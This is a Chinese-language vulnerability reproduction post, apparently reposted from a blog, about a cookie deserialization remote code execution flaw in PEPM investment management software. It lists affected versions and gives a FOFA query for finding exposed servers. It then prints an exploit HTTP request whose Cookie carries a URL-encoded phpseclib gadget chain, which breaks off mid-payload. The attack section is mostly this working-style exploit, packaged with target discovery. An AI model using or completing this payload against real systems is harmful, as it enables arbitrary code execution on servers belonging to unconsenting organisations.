0x01 产品简介
PEPM是由苏州梓川信息科技有限公司开发的中国领先股权投资管理软件。PEPM致力于将成熟互联网技术与企业业务应用结合,为用户提供专业、易用且低成本的软件服务。PEPM覆盖了募、投、管、退等基金运营和业绩管理的各个环节,满足投资机构从项目筛选、尽职调查、投资决策、投后管理到退出清算的全流程管理需求。
0x02 漏洞概述
PEPM系统存在远程代码执行漏洞,Cookie的auth字段存在反序列化漏洞,攻击者可构造反序列化链生成恶意数据,执行任意PHP代码。
0x03 影响范围
PEPM < V6.7.3.20240507.Release
0x04 复现环境
FOFA:header="pepm"
0x05 漏洞复现
Exp
GET / HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Cookie: auth=a%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3Bs%3A10%3A%22block_size%
本文转载自: https://blog.csdn.net/qq_41904294/article/details/140907116
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。
版权归原作者 0xSecl 所有, 如有侵权,请联系我们删除。